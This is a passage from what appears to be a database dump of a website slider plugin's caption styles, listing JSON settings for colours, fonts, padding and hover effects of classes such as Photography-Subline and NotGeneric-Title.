"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(72,'.tp-caption.Photography-Subline','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#777777\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(73,'.tp-caption.Photography-ImageHover','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"0.5\",\"scalex\":\"0.8\",\"scaley\":\"0.8\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"1000\",\"easing\":\"power3.inOut\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"22\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(74,'.tp-caption.Photography-Menuitem','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#00ffde\",\"background-transparency\":\"0.65\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0.65\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(75,'.tp-caption.Photography-Textblock','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(76,'.tp-caption.Photography-Subline-2','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.35\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(77,'.tp-caption.Photography-ImageHover2','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"0.5\",\"scalex\":\"0.8\",\"scaley\":\"0.8\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"500\",\"easing\":\"back.out\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"22\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Arial\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(78,'.tp-caption.WebProduct-Title','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#333333\",\"color-transparency\":\"1\",\"font-size\":\"90px\",\"line-height\":\"90px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(79,'.tp-caption.WebProduct-SubTitle','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#999999\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(80,'.tp-caption.WebProduct-Content','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#999999\",\"color-transparency\":\"1\",\"font-size\":\"16px\",\"line-height\":\"24px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(81,'.tp-caption.WebProduct-Menuitem','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#999999\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#333333\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(82,'.tp-caption.WebProduct-Title-Light','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"90px\",\"line-height\":\"90px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(83,'.tp-caption.WebProduct-SubTitle-Light','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.35\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"parallax\":\"-\"}'),(84,'.tp-caption.WebProduct-Content-Light','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.65\",\"font-size\":\"16px\",\"line-height\":\"24px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"parallax\":\"-\"}'),(85,'.tp-caption.FatRounded','{\"hover\":\"true\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#d3d3d3\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"50px\",\"50px\",\"50px\",\"50px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"20px\",\"22px\",\"20px\",\"25px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0.5\",\"border-color\":\"#d3d3d3\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"50px\",\"50px\",\"50px\",\"50px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(86,'.tp-caption.NotGeneric-Title','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"[object Object]\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"70px\",\"line-height\":\"70px\",\"font-weight\":\"800\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"10px 0px 10px 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(87,'.tp-caption.NotGeneric-SubTitle','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"4px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"13px\",\"line-height\":\"20px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(88,'.tp-caption.NotGeneric-CallToAction','{\"hover\":\"true\",\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":\"0px 0px 0px 0px\",\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power3.out\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"10px 30px 10px 30px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(89,'.tp-caption.NotGeneric-Icon','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"default\",\"speed\":\"300\",\"easing\":\"power3.out\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"0px 0px 0px 0px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0px\",\"border-radius\":\"0px 0px 0px 